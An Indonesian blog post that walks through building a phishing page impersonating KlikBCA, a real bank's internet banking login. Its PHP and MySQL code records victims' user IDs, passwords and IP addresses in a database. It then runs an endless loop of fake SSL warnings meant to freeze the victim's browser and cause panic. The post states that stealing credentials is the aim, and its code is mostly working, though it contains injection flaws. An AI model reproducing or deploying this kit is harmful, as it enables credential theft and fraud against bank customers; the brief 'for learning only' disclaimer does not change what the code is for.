Arrow

Phising Attack : Login Overlow

Posted by Unknown ~ on Jumat, 15 Februari 2013 ~ 0 comments

DFD PhishingPhishing!! Yeah, pasti sudah tahu kan apa artinya phishing?
Kalau belum tahu silahkan check it http://en.wikipedia.org/wiki/Phishing
Saya akan berbagi coding sederhana php dan database mysql dalam proses overflow. Data Korban akan di simpan ke dalam database, jadi sebelumnya kalian harus membuat database yang sesuai dengan Login Phishing.
Data Flow Diagram Phishing
Ketika korban terjebak dengan login phishing, web browser korban akan crash dan CPU Range Korban menjadi 100%

Sebagai contoh saya akan demonstrasi phishing pada KLIKBCA

bca

Membuat 3c.php
<?php
include “koneksi.php”;
$User = $_POST['UserId'];
$passwd = $_POST['passwd'];

$ip = getenv(REMOTE_ADDR);

$tgl = date(“j F Y, g:i a”);

$query = “INSERT INTO hack (user, passwd, ip, tgl) VALUES (‘$User’, ‘$passwd’, ‘$ip’, ‘$tgl’)”;
mysqli_query($konek, $query); // kirim query ke database
$hasil = mysqli_affected_rows($konek); // cek perubahan data di database
// login.php adalah URL Direct letak overflow
if ($hasil > 0)
{

header(‘location:../login.php’ );

}

else

{

echo “gagal”;

}

?>

Membuat koneksi.php
<?php
$database = “bca”; // nama database
$host = “localhost”; // nama host

$nama = “root”; // username database

$pass = “haning”; // password database

$konek = mysqli_connect($host, $nama, $pass, $database); // konek ke database
if(mysqli_connect_errno())
{

echo “Koneksi Ke Server Gagal.”;

exit();

}

?>

Tempat berlangsungnya overflow, saya namakan login.php
<?php
mysql_connect (“localhost”, “root”,”haning”) or die (mysql_error());

mysql_select_db (“bca”) or die(mysql_error());

$over = $_POST['login']; // button submit “login”
$sql = mysql_query(” select * from hack where user like ‘%$over%’ “);
$row = mysql_fetch_array($sql);
// Proses Oveflow, lebih tepatnya Perulangan Pencarian
if ($row > 0)
{

while ($row){

echo “At “.$row['tgl'].” Secure Socket SSL Invalid. Please, do not process access to BCA Internet Banking.<br>”;

}

}

else

{

echo “overflow gagal”;

}

?>
Tujuan di balik phishing ini adalah mencuri informasi korban di balik login palsu dan membuat panik korban. Ketika korban panik, maka ia akan menutup login tersebut dan sang Attacker mendapatkan user login korban di dalam database yang telah disiapkan sebelumnya.
Simak VIDEO nya Disini:



 





Untuk Download Video Demonstrasi Klik
DISINI
Artikel ini hanya semata-mata untuk pembelajaran, penulis tidak bertanggung jawab sama sekali atas tindakan diluar artikel ini. Gunakan artikel ini sebagai pembelajaran dan memproteksi diri.
Selamat mencoba & semoga berhasil, jangan lupa untuk berkunjung kesini untuk berkumpul dengan BinusHacker Family Lainnya:


Artikel Terkait:

Comments
0 Comments

Tidak ada komentar:

Leave a Reply

Harap mengisi komentar jika telah membaca demi kemajuan blog ini

Pengunjung

.

Followers